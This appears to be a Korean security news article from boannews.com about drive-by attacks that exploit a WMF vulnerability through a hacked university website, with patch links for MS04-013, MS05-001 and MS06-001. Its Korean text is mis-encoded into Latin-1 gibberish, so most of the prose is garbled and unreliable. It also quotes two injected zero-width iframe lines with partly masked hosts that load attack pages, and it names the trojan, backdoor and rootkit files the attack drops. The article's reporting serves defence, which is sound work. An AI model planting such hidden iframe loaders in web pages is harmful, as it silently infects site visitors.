wmf Ãë¾àÁ¡ ÀÌ¿ë °ø°Ý Áö¼ÓµÇ°í ÀÖ´Ù!
Áö¿ÀÆ® ¹ÙÀÌ·¯½º ºÐ¼®½Ç(GCERT)Àº ¡°17ÀÏ »õº® 12½Ã 50ºÐ°æ ±¹³» ƯÁ¤ ´ëÇÐ »çÀÌÆ®¿¡¼ sex.wmf ÆÄÀÏÀ» À¯Æ÷ ÁßÀÎ °ÍÀ» ¹ß°ßÇß´Ù¡±°í ¹ßÇ¥Çß´Ù.
ÇØÅ·´çÇÑ ´ëÇÐ »çÀÌÆ®¿¡ Á¢¼ÓÀ» ÇÏ°Ô µÇ¸é º¸¾ÈÃë¾àÁ¡À» ÅëÇؼ À妽º ÆÄÀÏ¿¡ Æ÷ÇÔµÈ ¾Æ·¡ÀÇ Äڵ尡 ½ÇÇàµÈ´Ù.
<iframe src=http://211**************/afu.htm width=0 height=0></iframe>
<iframe src="http://www.m*********.kr/index.html" width="0" height="0" frameborder="0">
afu.htm °ú index.htmlÀÌ ½ÇÇàµÇ¸é¼ ¾Æ·¡ÀÇ sex.wmf ÆÄÀÏÀ» ¼³Ä¡ÇÑ´Ù.
http://211**************/sex.wmf
¶ÇÇÑ ½Ã½ºÅÛÆú´õ¿¡ explorer.exe(41,567 ¹ÙÀÌÆ®)¿Í dab1.dll(41,472 ¹ÙÀÌÆ®) µîÀÇ °ÔÀÓÁ¤º¸ Å»Ãë¿ë ½ÅÁ¾ Æ®·ÎÀ̸ñ¸¶µµ °°ÀÌ ¼³Ä¡µÈ´Ù.
sex.wmf °¡ ½ÇÇàµÇ¸é ½Ã½ºÅÛÆú´õ¿¡ a.exe °¡ ¼³Ä¡µÇ°í ´Ù½Ã À©µµ¿ì Æú´õ¿¡ ¹éµµ¾î ÇÁ·Î±×·¥À» ¼û±è ¼Ó¼ºÀ¸·Î ¼³Ä¡¸¦ ½ÃµµÇÑ´Ù.
±×ÈÄ myserver_HOOk.DLL ÀÌ ÀÛµ¿µÇ¸é¼ ÇØ´ç ÆÄÀÏÀº ·çƮŶ ±â´ÉÀ¸·Î »ç¿ëÀÚ ÄÄÇ»ÅÍ¿¡¼ º¸¿©ÁöÁö ¾Ê´Â´Ù.
Áö¿ÀÆ® °ü°èÀÚ´Â ¡°ÀÌ Ã³·³ ¿¬ÀÏ ¸¹Àº »çÀÌÆ®µéÀÌ À¥»çÀÌÆ® º¯Á¶ÇÇÇØ·Î ÀÎÇÏ¿©, ºÒƯÁ¤´Ù¼öÀÇ »çÀÌÆ® Á¢¼ÓÀڵ鿡°Ô ¾ÇÀÇÀûÀÎ Æ®·ÎÀ̸ñ¸¶ ÇÁ·Î±×·¥À» À¯Æ÷ÇÏ°í ÀÖ¾î °¢º°ÇÑ ÁÖÀÇ°¡ ¿ä¸ÁµÇ°í ÀÖ´Ù¡±°í °æ°íÇß´Ù.
º¸¾ÈÃë¾àÁ¡À» ÅëÇÑ °¨¿°¿¹¹æÀ» À§ÇÏ¿© ÃÖ½ÅÀÇ ¹é½ÅÇÁ·Î±×·¥°ú ÀÎÅÍ³Ý ÀͽºÇ÷η¯¸¦ »ç¿ëÇϸç, À©µµ º¸¾ÈÆÐÄ¡´Â ¹Ýµå½Ã ¼³Ä¡ÇÏ´Â °ÍÀÌ Áß¿äÇÏ´Ù.
¶ÇÇÑ ±×´Â ¡°¾Æ¿ô·è Ãë¾àÁ¡ ÆÐÄ¡(MS04-013)´Â MHTML URL ó¸® Ãë¾àÁ¡À¸·Î Outlook Express°¡ ½Ã½ºÅÛ¿¡¼ ±âº» ÀüÀÚ ¸ÞÀÏ ÇÁ·Î±×·¥À¸·Î »ç¿ëµÇÁö ¾Ê´Â °æ¿ì¿¡µµ ¹ß»ýÇÒ ¼ö ÀÖÀ¸¸ç, ÇØÅ·µÇ¾î Æ®·ÎÀ̸ñ¸¶¸¦ À¯Æ÷ÇÏ´Â °æ¿ì ÀÌ Ãë¾àÁ¡À» ÀÌ¿ëÇÏ°Ô µÈ´Ù¡±°í ¹àÇû´Ù.
¾Æ·¡¿¡¼ Àڽſ¡°Ô ¼³Ä¡µÇ¾î ÀÖ´Â ÇØ´ç ¾Æ¿ô·è ¹öÀü°ú µ¿ÀÏÇÑ ÆÐÄ¡¸¦ ¹Þ¾Æ¼ ¼³Ä¡ÇÏ¸é µÇ°í, ±×¿Ü 64ºñÆ® ¹öÀüÀº ¾Æ·¡ ¸µÅ©¿¡¼ Á÷Á¢ ´Ù¿î·Îµå°¡ °¡´ÉÇÏ´Ù.
http://www.microsoft.com/korea/technet/security/bulletin/MS04-013.asp
http://www.microsoft.com/korea/technet/security/bulletin/MS05-001.mspx
WMFÆÄÀÏÀÇ Ãë¾àÁ¡À¸·Î ÀÎÇÑ ÄÚµå ½ÇÇà Ãë¾àÁ¡À» ÀÌ¿ëÇÑ º¯Á¾ Æ®·ÎÀ̸ñ¸¶µéÀÌ Áö¼ÓÀûÀ¸·Î ¹ß°ßµÊ¿¡ µû¶ó ¸¶ÀÌÅ©·Î ¼ÒÇÁÆ®»ç¿¡¼ °ø½ÄÀûÀÎ ÆÐÄ¡¸¦ ±ä±Þ ¾÷µ¥ÀÌÆ® Çß´Ù.
<¼³Ä¡ ´ë»ó ½Ã½ºÅÛ>
Windows 2000(SP4), Windows XP(SP2), Windows 2003 Server
http://www.microsoft.com/technet/security/Bulletin/ms06-001.mspx
[±æ¹Î±Ç ±âÀÚ(is21@infothe.com)]
<ÀúÀÛ±ÇÀÚ: º¸¾È´º½º(www.boannews.com). ¹«´ÜÀüÀç-Àç¹èÆ÷±ÝÁö.>